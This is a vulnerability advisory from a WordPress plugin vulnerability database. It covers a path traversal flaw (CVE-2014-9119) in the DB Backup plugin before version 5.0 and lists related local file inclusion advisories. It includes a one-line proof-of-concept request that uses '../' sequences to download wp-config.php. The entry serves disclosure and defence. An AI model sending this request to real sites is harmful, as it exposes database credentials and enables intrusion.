WordPress Plugin Vulnerabilities

DB Backup < 5.0 - Path Traversal File Access

Description

Proof of Concept:

/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php

Affects Plugins

Plugin icon
db-backup
Fixed in 5.0

References

CVE
CVE-2014-9119

Classification

Type
LFI
OWASP top 10
A1: Injection
CWE
CWE-22

Miscellaneous

Submitter
ethicalhack3r
Submitter twitter
ethicalhack3r
Verified
No
WPVDB ID
d3f1e51e-5f44-4a15-97bc-5eefc3e77536

Timeline

Publicly Published
2014-12-16 (about 11 years ago)
Added
2014-12-16 (about 11 years ago)
Last Updated
2019-10-21 (about 6 years ago)

Other

Published
Title
Published
2024-07-27
Title
News Element Elementor Blog Magazine < 1.0.6 - Unauthenticated LFI
Published
2025-08-25
Title
Jannah < 7.5.1 - Unauthenticated Local File Inclusion
Published
2016-10-28
Title
SAM Pro (Free Edition) < 1.9.7.69 - Local File Inclusion (LFI)
Published
2025-08-24
Title
Custom Query Shortcode < 0.5.0 - Authenticated (Contributor+) Path Traversal via lens Parameter
Published
2025-01-23
Title
Post Grid, Slider & Carousel Ultimate – with Shortcode, Gutenberg Block & Elementor Widget < 1.7 - Authenticated (Contributor+) Local File Inclusion via post_type_ajax_handler()